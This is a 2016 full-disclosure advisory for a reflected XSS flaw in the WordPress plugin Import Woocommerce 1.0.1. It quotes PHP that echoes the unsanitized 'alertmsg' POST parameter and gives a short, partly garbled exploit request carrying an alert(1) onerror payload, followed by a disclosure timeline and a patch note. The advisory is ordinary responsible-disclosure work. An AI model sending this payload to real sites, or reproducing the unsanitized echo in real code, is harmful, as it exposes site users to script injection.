Import Woocommerce XSS Vulnerability

Rahul Pratap Singh <techno.rps@xxxxxxxxx> · Wed, 24 Feb 2016 19:40:47 +0530



        ## FULL DISCLOSURE
      
       
        #Product : Import Woocommerce

          #Exploit Author : Rahul Pratap Singh

          #Version : 1.0.1

          #Home page Link : https://wordpress.org/plugins/import-woocommerce/

          #Website : 0x62626262.wordpress.com

          #Linkedin : https://in.linkedin.com/in/rahulpratapsingh94

          #Date : 24/Feb/2016
        XSS Vulnerability:
        ----------------------------------------

          Description:

          ----------------------------------------

          "alertmsg" parameter is not sanitized that leads to Reflected
          XSS.
        ----------------------------------------

          Vulnerable Code:

          ----------------------------------------

          File: index.php

          Line:229-232
        function translate_alertstr(){
        if(isset($_POST['alertmsg']))
        echo __($_POST['alertmsg'],'import-woocommerce');
        
          die();

            
        ----------------------------------------

          Exploit:

          ----------------------------------------

          POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
        
          action=""

            src=x _onerror_=alert(1)>
        
         
        ----------------------------------------

          POC:

          ----------------------------------------

          https://0x62626262.files.wordpress.com/2016/02/import-woocommercexsspoc.png?w=1700

        
        Fix:

          Update to 1.1
        Vulnerability Disclosure
          Timeline:

          → January 30, 2016     – Bug discovered, initial report to
          WordPress

          → February 1, 2016     – WordPress response, plugin taken down

          → February 24, 2016   – Vendor Deployed a Patch
        #######################################

          # CTG SECURITY SOLUTIONS # 

          #
            www.ctgsecuritysolutions.com  #             
                  

          #######################################
        Pub Ref:

          https://wordpress.org/plugins/import-woocommerce/changelog/

          
      [+] Disclaimer

        Permission is hereby granted for the redistribution of this
        advisory,

        provided that it is not altered except by reformatting it, and
        that due

        credit is given. Permission is explicitly given for insertion in

        vulnerability databases and similar, provided that due credit is
        given to

        the author.

        The author is not responsible for any misuse of the information
        contained

        herein and prohibits any malicious use of all security related
        information

        or exploits by the author or elsewhere.
    
  
Attachment:
0x9ACF7D5F.asc

Description: application/pgp-keys
Attachment:
signature.asc

Description: OpenPGP digital signature